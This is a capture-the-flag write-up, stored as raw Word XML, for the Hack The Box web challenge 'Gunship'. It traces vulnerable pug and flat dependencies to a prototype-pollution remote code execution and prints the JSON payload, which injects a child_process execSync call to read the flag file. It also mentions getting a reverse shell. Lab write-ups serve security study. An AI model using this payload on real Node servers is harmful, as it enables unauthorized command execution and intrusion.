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ECF2EB"/>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rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gjdgxs" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:color w:val="fe3b3b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:color w:val="111927"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gunship</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_30j0zll" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>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A city of lights, with retro futuristic 80s peoples, and coffee, and drinks from another world... all the wooing in the world to make you feel more lonely... This ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶</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111927"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1fob9te" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Context</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:color w:val="111927"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3znysh7" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go through the web-page, analyze the code and find a vulnerability to get a shell.</w:t>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111927"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tyjcwt" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:color w:val="111927"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">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First thing I did was start the instance and open Inspect-element, went to the network tab and see what .js files are being called and check the code of each one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">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Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I only got one js file called main.js which seems to have a POST request sent to ‘/api/submit’ when I submit a name with the textbox at the bottom.</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left="720" w:firstLine="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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="224790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firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="72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After finding this I ran Burp-suite and went to submit some data to get the request to ‘/api/submit’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2349500"/>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ind w:left="0" w:firstLine="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Looking at the source code again I wanted to see if any of the dependencies are vulnerable, in which they are, pug 3.0.0 has an exploit to get RCE.</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left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>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"dependencies": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">"express": "^4.17.1",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">"flat": "5.0.0",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">"pug": "^3.0.0"</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ind w:left="0" w:firstLine="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This is the Issue it faces:</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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
            <w:b w:val="1"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/pugjs/pug/issues/3312</w:t>
        </w:r>
      </w:hyperlink>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ind w:left="0" w:firstLine="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POC:</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ind w:left="0" w:firstLine="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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="23876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ind w:left="0" w:firstLine="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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="27178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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:color w:val="111927"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3dy6vkm" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:color w:val="111927"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="72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That's it, to get the flag do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">"artist.name":"Haigh","__proto__.block": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">"type": "Text", </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">"line": "process.mainModule.require('child_process').execSync('$(cat flag*)')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="14605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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4co4hxtedx4a" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extra</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:b w:val="0"/>
          <w:color w:val="111927"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="72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You can get an easy reverse shell with TTY, the only issue is doing anything without standard privileges and the chance to be able to escalate them further.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="111927"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get the flag : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB{wh3n_lif3_g1v3s_y0u_p6_st4rT_p0llut1ng_w1th_styl3!!}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="111927"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId12" w:type="default"/>
      <w:headerReference r:id="rId13" w:type="first"/>
      <w:footerReference r:id="rId14" w:type="first"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1077.1653543307089" w:top="1077.1653543307089"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mfortaa SemiBold">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId2" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Playfair Display">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omfortaa">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color w:val="b7b7b7"/>
        <w:sz w:val="12"/>
        <w:szCs w:val="12"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:1404.0pt;height:960.6315748031495pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata blacklevel="22938f" cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" gain="19661f" r:id="rId1" o:title="image10.png"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="Table1"/>
      <w:tblW w:w="12660.0" w:type="dxa"/>
      <w:jc w:val="left"/>
      <w:tblInd w:w="-1875.0" w:type="dxa"/>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0600"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="4365"/>
      <w:gridCol w:w="4710"/>
      <w:gridCol w:w="3585"/>
      <w:tblGridChange w:id="0">
        <w:tblGrid>
          <w:gridCol w:w="4365"/>
          <w:gridCol w:w="4710"/>
          <w:gridCol w:w="3585"/>
        </w:tblGrid>
      </w:tblGridChange>
    </w:tblGrid>
    <w:tr>
      <w:trPr>
        <w:cantSplit w:val="0"/>
        <w:trHeight w:val="990" w:hRule="atLeast"/>
        <w:tblHeader w:val="0"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:gridSpan w:val="2"/>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28">
          <w:pPr>
            <w:pStyle w:val="Subtitle"/>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1t3h5sf" w:id="7"/>
          <w:bookmarkEnd w:id="7"/>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>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2A">
          <w:pPr>
            <w:pStyle w:val="Subtitle"/>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0"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4d34og8" w:id="8"/>
          <w:bookmarkEnd w:id="8"/>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:color w:val="ffffff"/>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466725</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>3739314</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="3011182" cy="2483247"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
